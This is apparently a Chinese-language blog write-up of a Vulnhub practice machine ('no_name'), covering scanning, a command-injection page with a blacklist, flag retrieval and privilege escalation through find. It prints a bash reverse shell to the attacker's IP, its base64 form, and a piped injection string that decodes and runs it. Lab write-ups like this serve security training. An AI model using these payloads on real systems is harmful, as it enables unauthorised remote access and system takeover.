Vulnhub靶机no_name渗透

132 阅读1分钟

靶机介绍 官方下载地址:www.vulnhub.com/entry/hacla… 靶机获取shell比较难,提权比较容易,一共有三个flag在用户的家目录里面,需要在virtualbox运行,网络设为桥接 在这里插入图片描述 运行环境 靶机:网络设为桥接,IP地址:192.168.1.91 攻击机:同网段下的kali linux,IP地址:192.168.1.37 开始渗透 运行靶机 在这里插入图片描述 获取靶机IP地址 在这里插入图片描述 扫描端口及其服务 在这里插入图片描述 看到只开放了一个80端口,扫一下目录 在这里插入图片描述 在这里插入图片描述 开始访问得到的目录 80端口的首页,不管输入啥都回显Fake ping wxecuted 在这里插入图片描述 admin是一个宣传页面, 在这里插入图片描述 superadmin.php是一个命令执行的页面 在这里插入图片描述 查看superadmin.php页面的源码,发现有黑名单过滤 在这里插入图片描述 目录分隔符被过滤了可以将反弹shell的命令使用base64加密之后再执行 源代码:bash -i >& /dev/tcp/192.168.1.37/4444 0>&1 加密之后:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzcvNDQ0NCAwPiYx kali开启监听之后,执行命令127.0.0.1|echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzcvNDQ0NCAwPiYx"|base64 -d|bash 在这里插入图片描述 监听成功,查看你所有用户 在这里插入图片描述 有三个用户在yash用户的家目录下找到了flag1.txt 在这里插入图片描述 提示haclabs用户的密码在隐藏文件当中,查看yash用户的所有文件 在这里插入图片描述 查看隐藏文件passwd 在这里插入图片描述 知道haclabs用户的密码,使用su切换到haclabs用户 在这里插入图片描述 在haclabs用户的家目录里面找到了flag2.txt 在这里插入图片描述 使用sudo提权,或者查看usid 在这里插入图片描述 haclabs用户在find的用户组里面 查看find的提权命令 在这里插入图片描述 成功找到flag3.txt 在这里插入图片描述 成功找到所有flag,这个靶机就完成了!